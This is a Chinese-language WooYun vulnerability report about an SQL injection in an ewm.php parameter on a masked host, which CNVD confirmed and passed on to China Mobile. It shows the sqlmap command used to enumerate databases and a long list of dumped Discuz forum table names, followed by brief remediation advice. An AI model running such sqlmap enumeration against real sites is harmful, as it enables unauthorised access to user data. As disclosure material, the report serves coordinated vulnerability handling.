漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2015-12-19:	细节已通知厂商并且等待厂商处理中
									2015-12-23:	厂商已经确认,细节仅向厂商公开
									2016-01-02:	细节向核心白帽子及相关领域专家公开
									2016-01-12:	细节向普通白帽子公开
									2016-01-22:	细节向实习白帽子公开
									2016-02-04:	细节向公众公开
								
简要描述:
RT
详细说明:
注入点:http://**.**.**.**/ewm.php?code=2871871AX174141/
影响库:
D:\Program Files (x86)\admins\python\sqlmap-master>python D:\sqlmap-master\sqlma
p.py -u "http://**.**.**.**/ewm.php?code=2871871AX174141" --dbs
账号密码:
 
漏洞证明:
表
pre common admincp cmenu          |
| pre common admincp group          |
| pre common admincp member         |
| pre common admincp perm           |
| pre common admincp session        |
| pre common admingroup             |
| pre common adminnote              |
| pre common advertisement          |
| pre common advertisement custom   |
| pre common banned                 |
| pre common block                  |
| pre common block favorite         |
| pre common block item             |
| pre common block item data        |
| pre common block permission       |
| pre common block pic              |
| pre common block style            |
| pre common block xml              |
| pre common cache                  |
| pre common card                   |
| pre common card log               |
| pre common card type              |
| pre common connect guest          |
| pre common credit log             |
| pre common credit log field       |
| pre common credit rule            |
| pre common credit rule log        |
| pre common credit rule log field  |
| pre common cron                   |
| pre common devicetoken            |
| pre common district               |
| pre common diy data               |
| pre common domain                 |
| pre common failedip               |
| pre common failedlogin            |
| pre common friendlink             |
| pre common grouppm                |
| pre common invite                 |
| pre common magic                  |
| pre common magiclog               |
| pre common mailcron               |
| pre common mailqueue              |
| pre_common_member                 |
| pre common member action log      |
| pre common member connect         |
| pre common member count           |
| pre common member crime           |
| pre common member field forum     |
| pre common member field home      |
| pre common member forum buylog    |
| pre common member grouppm         |
| pre_common_member_log             |
| pre common member magic           |
| pre common member medal           |
| pre common member newprompt       |
| pre common_member_profile         |
| pre common member profile setting |
| pre common member security        |
| pre common member secwhite        |
| pre common member stat field      |
| pre common member status          |
| pre common member validate        |
| pre common member verify          |
| pre common member verify info     |
| pre common member wechat          |
| pre common member wechatmp        |
| pre common myapp                  |
| pre common myinvite               |
| pre common mytask                 |
| pre common nav                    |
| pre common onlinetime             |
| pre common optimizer              |
| pre common patch                  |
| pre common plugin                 |
| pre common pluginvar              |
| pre common process                |
| pre common regip                  |
| pre common relatedlink            |
| pre common remote port            |
| pre common report                 |
| pre common searchindex            |
| pre common seccheck               |
| pre common secquestion            |
| pre common session                |
| pre common setting                |
| pre common smiley                 |
| pre common sphinxcounter          |
| pre common stat                   |
| pre common statuser               |
| pre common style                  |
| pre common stylevar               |
| pre common syscache               |
| pre common tag                    |
| pre common tagitem                |
| pre common task                   |
| pre common taskvar                |
| pre common template               |
| pre common template block         |
| pre common template permission    |
| pre common uin black              |
| pre common usergroup              |
| pre common usergroup field        |
| pre common visit                  |
| pre common word                   |
| pre common word type              |
| pre connect disktask              |
| pre connect feedlog               |
| pre connect memberbindlog         |
| pre connect postfeedlog           |
| pre connect tthreadlog            |
| pre forum access                  |
| pre forum activity                |
| pre forum activityapply           |
| pre forum announcement            |
| pre forum attachment              |
| pre forum attachment 0            |
| pre forum attachment 1            |
| pre forum attachment 2            |
| pre forum attachment 3            |
| pre forum attachment 4            |
| pre forum attachment 5            |
| pre forum attachment 6            |
| pre forum attachment 7            |
| pre forum attachment 8            |
| pre forum attachment 9            |
| pre forum attachment exif         |
| pre forum attachment unused       |
| pre forum attachtype              |
| pre forum bbcode                  |
| pre forum collection              |
| pre forum collectioncomment       |
| pre forum collectionfollow        |
| pre forum collectioninvite        |
| pre forum collectionrelated       |
| pre forum collectionteamworker    |
| pre forum collectionthread        |
| pre forum creditslog              |
| pre forum debate                  |
| pre forum debatepost              |
| pre forum faq                     |
| pre forum filter post             |
| pre forum forum                   |
| pre forum forum threadtable       |
| pre forum forumfield              |
| pre forum forumrecommend          |
| pre forum groupcreditslog         |
| pre forum groupfield              |
| pre forum groupinvite             |
| pre forum grouplevel              |
| pre forum groupuser               |
| pre forum hotreply member         |
| pre forum hotreply number         |
| pre forum imagetype               |
| pre forum medal                   |
| pre forum medallog                |
| pre forum memberrecommend         |
| pre forum moderator               |
| pre forum modwork                 |
| pre forum newthread               |
| pre forum onlinelist              |
| pre forum order                   |
| pre forum poll                    |
| pre forum polloption              |
| pre forum polloption image        |
| pre forum pollvoter               |
| pre forum post                    |
| pre forum post location           |
| pre forum post moderate           |
| pre forum post tableid            |
| pre forum postcache               |
| pre forum postcomment             |
| pre forum postlog                 |
| pre forum poststick               |
| pre forum promotion               |
| pre forum ratelog                 |
| pre forum relatedthread           |
| pre forum replycredit             |
| pre forum rsscache                |
| pre forum sofa                    |
| pre forum spacecache              |
| pre forum statlog                 |
| pre forum thread                  |
| pre forum thread moderate         |
| pre forum threadaddviews          |
| pre forum threadcalendar          |
| pre forum threadclass             |
| pre forum threadclosed            |
| pre forum threaddisablepos        |
| pre forum threadhidelog           |
| pre forum threadhot               |
| pre forum threadimage             |
| pre forum threadlog               |
| pre forum threadmod               |
| pre forum threadpartake           |
| pre forum threadpreview           |
| pre forum threadprofile           |
| pre forum threadprofile group     |
| pre forum threadrush              |
| pre forum threadtype              |
| pre forum trade                   |
| pre forum tradecomment            |
| pre forum tradelog                |
| pre forum typeoption              |
| pre forum typeoptionvar           |
| pre forum typevar                 |
| pre forum warning                 |
| pre home album                    |
| pre home album category           |
| pre home appcreditlog             |
| pre home blacklist                |
| pre home blog                     |
| pre home blog category            |
| pre home blog moderate            |
| pre home blogfield                |
| pre home class                    |
| pre home click                    |
| pre home clickuser                |
| pre home comment                  |
| pre home comment moderate         |
| pre home docomment                |
| pre home doing                    |
| pre home doing moderate           |
| pre home favorite                 |
| pre home feed                     |
| pre home feed app                 |
| pre home follow                   |
| pre home follow feed              |
| pre home follow feed archiver     |
| pre home friend                   |
| pre home friend request           |
| pre home friendlog                |
| pre home notification             |
| pre home pic                      |
| pre home pic moderate             |
| pre home picfield                 |
| pre home poke                     |
| pre home pokearchive              |
| pre home share                    |
| pre home share moderate           |
| pre home show                     |
| pre home specialuser              |
| pre home userapp                  |
| pre home userappfield             |
| pre home visitor                  |
| pre mobile setting                |
| pre mobile wechat authcode        |
| pre mobile wechat masssend        |
| pre mobile wechat resource        |
| pre mobile wsq threadlist         |
| pre portal article content        |
| pre portal article count          |
| pre portal article moderate       |
| pre portal article related        |
| pre portal article title          |
| pre portal article trash          |
| pre portal attachment             |
| pre portal category               |
| pre portal category permission    |
| pre portal comment                |
| pre portal comment moderate       |
| pre portal rsscache               |
| pre portal topic                  |
| pre portal topic pic              |
| pre security evilpost             |
| pre security eviluser             |
| pre security failedlog            |
| pre ucenter admins                |
| pre ucenter applications          |
| pre ucenter badwords              |
| pre ucenter domains               |
| pre ucenter failedlogins          |
| pre ucenter feeds                 |
| pre ucenter friends               |
| pre ucenter mailqueue             |
| pre ucenter memberfields          |
| pre ucenter members               |
| pre ucenter mergemembers          |
| pre ucenter newpm                 |
| pre ucenter notelist              |
| pre ucenter pm indexes            |
| pre ucenter pm lists              |
| pre ucenter pm members            |
| pre ucenter pm messages 0         |
| pre ucenter pm messages 1         |
| pre ucenter pm messages 2         |
| pre ucenter pm messages 3         |
| pre ucenter pm messages 4         |
| pre ucenter pm messages 5         |
| pre ucenter pm messages 6         |
| pre ucenter pm messages 7         |
| pre ucenter pm messages 8         |
| pre ucenter pm messages 9         |
| pre ucenter protectedmembers      |
| pre ucenter settings              |
| pre ucenter sqlcache              |
| pre ucenter tags                  |
| pre ucenter vars      
修复方案:
加强过滤,防止绕过。
数据库重要信息加密。 
版权声明:转载请注明来源 darkrerror@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-12-23 09:48
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。
最新状态:
暂无

 
                 
                        
